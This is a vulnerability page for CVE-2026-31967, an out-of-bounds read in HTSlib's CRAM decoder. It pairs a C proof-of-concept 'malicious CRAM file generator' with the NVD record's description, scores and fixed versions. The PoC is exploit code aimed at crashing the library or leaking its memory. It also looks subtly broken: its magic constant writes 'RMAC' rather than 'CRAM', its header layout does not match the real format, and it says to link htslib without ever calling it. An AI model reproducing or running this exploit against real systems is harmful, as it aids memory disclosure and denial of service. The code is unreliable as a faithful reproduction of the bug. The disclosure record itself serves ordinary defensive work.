CVE-2026-31967

/* * CVE-2026-31967 PoC - Malicious CRAM file generator * This PoC creates a minimal CRAM file with invalid mate_ref_id to trigger OOB read * Compile: gcc -o poc poc.c -lhts * Usage: ./poc malicious.cram */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdint.h> /* CRAM container header structure */ typedef struct { uint32_t magic; /* 'CRAM' magic number */ uint32_t version; /* CRAM version (e.g., 3.1) */ uint32_t length; /* Container length */ uint32_t num_blocks; /* Number of blocks */ } cram_container_header_t; /* CRAM slice header with crafted mate_ref_id */ typedef struct { uint32_t method; /* Compression method */ uint32_t ref_id; /* Reference sequence ID */ int32_t mate_ref_id; /* VULNERABILITY: Invalid mate_ref_id (e.g., -1 or large value) */ uint32_t align_start; /* Alignment start position */ uint32_t align_end; /* Alignment end position */ uint32_t record_count; /* Number of records */ } cram_slice_header_t; int create_malicious_cram(const char *filename) { FILE *fp = fopen(filename, "wb"); if (!fp) { fprintf(stderr, "Failed to create output file\n"); return -1; } /* Write CRAM container header */ cram_container_header_t container = { .magic = 0x43414D52, /* 'CRAM' in little-endian */ .version = 0x00030001, /* Version 3.1 */ .length = sizeof(container) + sizeof(cram_slice_header_t), .num_blocks = 1 }; fwrite(&container, sizeof(container), 1, fp); /* Write slice header with MALICIOUS mate_ref_id */ cram_slice_header_t slice = { .method = 1, .ref_id = 0, .mate_ref_id = 0x7FFFFFFF, /* INVALID: Out of bounds value */ .align_start = 100, .align_end = 150, .record_count = 1 }; fwrite(&slice, sizeof(slice), 1, fp); fclose(fp); printf("Malicious CRAM file created: %s\n", filename); printf("Trigger: Load this file with htslib and convert to SAM format\n"); return 0; } int main(int argc, char *argv[]) { if (argc != 2) { fprintf(stderr, "Usage: %s <output.cram>\n", argv[0]); return 1; } return create_malicious_cram(argv[1]); }

{"cve": {"id": "CVE-2026-31967", "sourceIdentifier": "[email protected]", "published": "2026-03-18T20:16:21.280", "lastModified": "2026-03-19T14:36:34.813", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HTSlib is a library for reading and writing bioinformatics file formats. CRAM is a compressed format which stores DNA sequence alignment data. In the `cram_decode_slice()` function called while reading CRAM records, the value of the mate reference id field was not validated. Later use of this value, for example when converting the data to SAM format, could result in the out of bounds array reads when looking up the corresponding reference name. If the array value obtained also happened to be a valid pointer, it would be interpreted as a string and an attempt would be made to write the data as part of the SAM record. This bug may allow information about program state to be leaked. It may also cause a program crash through an attempt to access invalid memory. Versions 1.23.1, 1.22.2 and 1.21.1 include fixes for this issue. There is no workaround for this issue."}, {"lang": "es", "value": "HTSlib es una biblioteca para leer y escribir formatos de archivo bioinformáticos. CRAM es un formato comprimido que almacena datos de alineación de secuencias de ADN. En la función 'cram_decode_slice()' llamada al leer registros CRAM, el valor del campo 'mate reference id' no fue validado. El uso posterior de este valor, por ejemplo al convertir los datos a formato SAM, podría resultar en lecturas de array fuera de límites al buscar el nombre de referencia correspondiente. Si el valor del array obtenido también resultara ser un puntero válido, sería interpretado como una cadena y se intentaría escribir los datos como parte del registro SAM. Este error podría permitir que se filtre información sobre el estado del programa. También podría causar un fallo del programa a través de un intento de acceder a memoria inválida. Las versiones 1.23.1, 1.22.2 y 1.21.1 incluyen correcciones para este problema. No hay solución alternativa para este problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}, {"lang": "en", "value": "CWE-129"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:htslib:htslib:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.21.1", "matchCriteriaId": "A069D6B6-FFF6-4DB7-9811-A568ECC4B288"}, {"vulnerable": true, "criteria": "cpe:2.3:a:htslib:htslib:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.22", "versionEndExcluding": "1.22.2", "matchCriteriaId": "D9D525C8-C8AD-4368-A396-EB4D9DA02B1C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:htslib:htslib:1.23:*:*:*:*:*:*:*", "matchCriteriaId": "AAA6BBB2-76F3-4372-9BAE-FDE157401EFD"}]}]}], "references": [{"url": "https://github.com/samtools/htslib/commit/9cefb464 ... (truncated)